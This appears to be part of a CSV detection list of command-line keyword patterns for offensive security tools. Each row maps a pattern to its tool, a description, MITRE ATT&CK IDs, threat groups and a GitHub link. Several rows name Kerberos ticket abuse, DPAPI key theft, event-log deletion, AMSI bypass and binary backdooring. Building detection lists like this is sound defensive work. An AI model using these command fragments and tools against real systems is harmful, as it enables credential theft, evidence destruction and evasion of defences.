-* amqp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* amsi_disable *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z
-* --am-si-bypass=*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-* --Args AntiVirus --XorKey*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z
-* --args whoami*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z
-* arp.x64.o,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,0,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z
-* asktgs * /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-* asktgs *.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-* asktgs /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-* asktgt * /service:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-* asktgt /user *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-* asktht /user:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-* asm.py -t * -ln -w resources/*.txt -o *,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z
-* asn-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* asreproast *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-* --asreproast *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* --asreproast *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* ASREProastables.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* ASREProastables.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* --assemblyargs AntiVirus*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z
-* --assemblyargs AppLocker*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z
-* Athena.Commands*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-* Athena.Models.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-* athena.mythic*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-* --attack bruteforce*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z
-* --attack injection*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z
-* --attack partial_d --key *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* --attack partial_q --key *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -attack remote_db -db_type * -db_username * -db_password *,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z
-* --attack vulns *,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z
-* -attack windows_application_event_log_local*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z
-* -attack windows_event_log*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z
-* -attack windows_security_event_log_remote*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z
-* --attacker-host *,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,0,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z
-* --attacker-port *,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,0,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z
-* -attak syslog*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z
-* --authmode ntlm --username * --password *,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z
-* auth-owners.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* auth-spoof.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* avred.py *,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -* avredweb.py *,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -* awsloot.py*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,0,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -* -b *.bin *.bin dump*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,0,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -* BabelStrike.py*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,0,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -* --backdoor *,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,0,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z -* backdoor.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* backorifice-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* backorifice-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* backupkey* /server:* /file*.pvk*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* bacnet-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* banner.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* base64_encode_shellcode*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,0,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -"* --basic ""FUZZ:FUZ2Z""*",offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --batch --dbs*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - 
TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --batch --password*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* beacon.dll*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 